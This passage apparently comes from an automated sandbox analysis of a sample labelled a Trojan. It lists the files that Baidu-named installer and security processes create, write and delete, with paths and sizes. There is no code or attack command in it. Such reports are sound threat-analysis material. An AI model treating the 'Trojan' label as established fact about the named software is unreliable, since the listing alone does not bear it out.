%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bduf.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMScriptVM.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\806.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\FileMon.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ccesign.dat (0 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\license.txt (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDriverFixer.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\smr.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKitUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hipsClient.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\cache_config.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\app.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0003.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavCommon.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\901.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMEvents.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\NetService.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\GCCommunicate.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVTray_PluginConfig.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\dl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafe.dll (0 bytes)
The process BaiduHips.exe:3260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000005.sst (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000004 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\smr.dat (95096 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (1368 bytes)
%System%\drivers\BDDefense.sys (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.1.xml (602 bytes)
%WinDir%\Temp\Tar1B.tmp (2784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.3.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_PreU_1.8.xml (619 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
%WinDir%\Temp\Cab1A.tmp (56 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1724 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000005.sst (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000004 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.1.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_PreU_1.8.xml (619 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\patch\BaiduAn_PreU_2.3.xml (602 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_customer.xml (597 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\000003.log (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000002 (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (0 bytes)
%WinDir%\Temp\Tar1B.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\CURRENT (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch (0 bytes)
%WinDir%\Temp\Cab1A.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.1.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000002 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_PreU_1.8.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_PreU_2.3.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\CURRENT (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\000003.log (0 bytes)
The process BaiduHips.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.dll (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.dll (3897 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.dll (5873 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (6347 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (112 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.6.xml (17 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (384 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.xml (17 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (36 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (37839 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.8.dll (2321 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.dll (7972 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.dll (9098 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.dll (7972 bytes)
%WinDir%\Temp\Tar15.tmp (2784 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.3.dll (6841 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.dll (8657 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (223 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Common\Global.db (100 bytes)
%WinDir%\Temp\Cab14.tmp (56 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000002 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.2.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.dll (3897 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (1728 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000002 (4 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (816 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (7972 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.7.xml (17 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (2 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\BaiduSd_HipsClient_1.5.xml (17 bytes)
%System%\config\systemprofile\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (816 bytes)
The Trojan deletes the following file(s):
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\CURRENT (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.6.xml (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\FileSignDB\MANIFEST-000001 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.xml (0 bytes)
%WinDir%\Temp\Cab14.tmp (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\BaiduHipsCache.rptc (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.2.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\CURRENT (0 bytes)
%WinDir%\Temp\Tar15.tmp (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduHips\CachedDB_1\MANIFEST-000001 (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.7.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.8.dll (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduSd_HipsClient_1.5.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.1.xml (0 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\un7zpatch\patch\BaiduAn_HipsClient_2.3.xml (0 bytes)
The process bddownloader.exe:3300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys.tmp.bdl (11169 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\Desktop\Global.db (16 bytes)
%Program Files%\baidu\BaiduSd\2.1.0.3086\dnw.xml.tmp.bdl (245 bytes)
The process bddownloader.exe:3792 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\fe56763bd610dbf0db84b6cd8b10202a.bdt (71 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerConfig.dat.bdl (1261 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bdt\fb32afe4ccd37a3dbc2f8507075652b6.bdt (71 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\host.dat (306 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddl.bca (14 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerXMLScript.dat.bdl (158 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch5\putips_wording.dat.bdl (580 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch8\hipsClient.xml.bdl (5230 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch19\SysFixerLuaScript.dat.bdl (4154 bytes)
%Documents and Settings%\%current user%\Application Data\Baidu\BDDownload\4224106754\Setting\p2pconfig.dat (64 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch10\hipsClient.xml.bdl (3394 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BDDownload\bddlp.bca (8 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch8\hipsClient.xml.bdl (0 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\ModuleUpdate\Download\Patch5\putips_wording.dat.bdl (0 bytes)
The process G1023_s_70904.exe:3576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\SWManager.rdb (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\CompatibilityChecker.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSysFixerPlugin.dll (34186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatchAgent.dll (3104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMDownload.dll (11496 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerLuaScript.dat (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnTray.exe (66168 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDConfig.dll (3073 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMPatcher.dll (27704 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDMTips.rdb (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduHips.exe (1856 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0001.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_product.xml (291 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\patch.7z (23296 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNet.dll (60999 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOLiveAccEngine.dll (8560 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x64\BDArKit.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\nsExec.dll (15 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMPatchAgent.dll (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAcceleratorPlugin.dll (29608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWNestCore.dll (18424 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMUpdate.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccCoolyPlugin.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftMgrCoolyPlugin.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\LocalPluginInfo.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerScript.dat (2392 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMMsg.dll (47 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_blank_speed.png (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\virus_type.dat (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\libcurl.dll (10136 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceCleanerConfig.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDCooly.dll (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\NotInstalledPlugin.xml (428 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0002.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDDefense.sys (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_appassext.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PreU.xml (643 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDDriverFixer.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDArKit.sys (11688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysFixerConfig.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDActiveDefensePlugin.dll (7192 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsIU.dll (63 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\ad.dll (3361 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\bd0001.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\7z.dll (12536 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsCore.dll (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\res\text_cn.str (757 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\bd0002.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSOAccSusPlugin.dll (12536 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\Unknownfile.rdb (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_self_enc.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\scan_mgr_config.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMAVCached.dll (24416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\wverify.dat (66168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\sw_acc.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\homepage.ini (361 bytes)
%WinDir%\Fonts\baiduan_number_new.ttf (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\PluginManager.dll (33295 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWDeskGuide.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\vcrt.msi (22552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\publish.db (185551 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\DriverManager.dll (601 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BaiduHipsBusiness.dll (1281 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_second_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_7_speed.png (15 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\KVCommonRes.rdb (3616 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Tips\win8_1_num_6_speed.png (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASWUpdateTip.dll (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GlobalPluginInfo.xml (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMNetMonSusPlugin.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp17.tmp (2013786 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\InstallCfg.xml (177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDEnhanceBoost.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDPerflog.dll (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAn.exe (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnBugRpt.exe (23936 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\blacksign.dat (852 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMStringUtils.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\GetSystemVer.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOTraceConfig.xml (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCommunicate.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMSWDeepClean.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOGarbageConfig.xml (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\hips_customer.xml (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMKVMainPlugin.dll (25776 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\hips_customer.xml (75 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\drivers\x86\bd0002.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\baiduan_number_new.ttf (784 bytes)
%System%\config\SYSTEM.LOG (9441 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\NetService.ini (615 bytes)
%Program Files%\Common Files\Baidu\BaiduHips\1.1.0.733\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDLogicUtils.dll (15656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMRepMgr.dll (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOCleanerPreScan.dat (1 bytes)
%Program Files%\baidu\BaiduAn\3.0.0.3971\Skins\Default\BDKV.rdb (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\BaiduAnBugRpt.exe (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\{F5E93978-539C-476B-9A7B-B6C32025A557}.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDASoftmgr.exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SysAccLiveStrategy.dat (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BaiduAnUpdate.exe (34365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\GCCallbackBind.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\SOSilentCleanerConfig.dat (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu18.tmp\file\BDMBase.dll (32128 bytes)
